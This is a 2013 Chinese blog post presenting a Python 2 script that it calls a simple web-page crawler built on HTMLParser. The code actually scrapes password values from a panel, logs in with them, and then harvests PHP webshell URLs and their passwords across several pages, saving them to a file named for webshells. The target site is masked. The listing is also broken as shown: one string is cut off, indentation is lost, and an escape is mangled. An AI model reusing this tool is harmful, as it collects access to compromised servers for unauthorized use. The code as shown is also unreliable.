11月
5
2013
0x01 今天写了个示例程序,用 Python 解析网页:HTMLParser 是核心,配合 urllib2,解析页面中的某些特定标签。
0x02 代码如下,作用是用来爬取页面信息的。
#coding=utf-8
'''
Created on 2013-11-5
@author: lenovo
'''
from HTMLParser import HTMLParser
import time
import urllib2
import urllib
import time
from urllib2 import urlopen
loginPass=[]
check=0
webshell=[]
temp=0
savefile=''
pagenum=0
class MyParser(HTMLParser):
"""一个简单的HTMLparser的例子"""
def handle_decl(self, decl):
"""处理头文档"""
HTMLParser.handle_decl(self, decl)
#print decl
def handle_starttag(self, tag, attrs):
"""处理起始标签"""
global loginPass
global check
global webshell
global temp
HTMLParser.handle_starttag(self, tag, attrs)
#if not HTMLParser.get_starttag_text(self).endswith("/>"):
#print ""
if tag=='tr' and self.rawdata.find("""
check=1
if tag=='a' and check==1 and len(attrs)>1 and attrs[1][1][-3:]=='php' :
#print attrs[1][1]
z=[]
z.append(attrs[1][1])
webshell.append(z)
temp=len(webshell)
if tag=='input' and check==1 and len(attrs)>3 and attrs[3][0]=='value' and attrs[1][0]=='style':
#print attrs
webshell[temp-1].append(attrs[3][1])
if tag=='input' and check==1 and len(attrs)==3 and attrs[2][0]=='value' and attrs[1][0]=='style' and attrs[0][1]=='text':
#print attrs
webshell[temp-1].append(attrs[2][1])
if tag=='input':
#print attrs
if attrs[0][0]=='type' and attrs[0][1]=='checkbox' and attrs[1][1]=='pwd[]' :
#print attrs[2][1]
loginPass.append(attrs[2][1]) # 处理图片
#for attr in attrs:
# for t in attr:
# print t
def handle_data(self, data):
"""处理文本元素"""
HTMLParser.handle_data(self, data)
#print data,
def handle_endtag(self, tag):
"""处理结束标签"""
HTMLParser.handle_endtag(self, tag)
if tag=='tr':
check=0
#if not HTMLParser.get_starttag_text(self).endswith("/>"):
#print "",tag,">"
def handle_startendtag(self, tag, attrs):
"""处理自闭标签"""
HTMLParser.handle_startendtag(self, tag, attrs)
#print HTMLParser.get_starttag_text(self)
def handle_comment(self, data):
"""处理注释"""
HTMLParser.handle_comment(self, data)
#print data
def close(self):
HTMLParser.close(self)
#print "parser over"
def Post(url,s):
try:
s1=urllib.quote(s,"=&")
#print s1
req = urllib2.Request(url,s1)
resp = urllib2.urlopen(req,timeout=10)
web=resp.read()
#print strlist
except Exception:
return ""
return web
def Get(url):
try:
#s1=urllib.quote(s,"=#"()[],@'&\")
#print s1
req = urllib2.Request(url)
resp = urllib2.urlopen(req,timeout=60)
web=resp.read()
#print strlist
except Exception:
return ""
return web
def saveWebshell():
file=open(savefile,'w')
for i in webshell:
print i
file.write(i[0]+','+i[1]+'n')
file.close()
print '******* Save SuccessFul ********'
#print 'Save SuccessFul'
#def getInfo(page):
def getPage(url,num):
if num==0:
if len(loginPass)!=0:
print '******* Login ********'
passWd='pwd[]='+loginPass[2]+'&pwd[]='+loginPass[4]
demo=MyParser()
demo.feed(Post(url,passWd))
demo.close()
print '******* Get Page '+str(num)+' ********'
urlNew=url+'&p='+str(num)
demo=MyParser()
demo.feed(Get(urlNew))
demo.close()
#def getTotal(url):
def login(url):
print '*******Get Password********'
demo=MyParser()
demo.feed(Get(url))
demo.close()
def autoSearch(url):
login(url)
#print loginPass
#getPage(url,0)
num=pagenum
for i in xrange(0,num+1):
page=getPage(url,i)
#getInfo(page)
print '******* Scan Over ********'
saveWebshell()
if __name__ == '__main__':
pagenum=9
savefile=r'E:work profitprofitjavaicetoolstoolsWebShellphp168.txt'
autoSearch('http://www.XXXX.com/core/centerxxxxx.php?s=php168')
pass
3,464 次访问过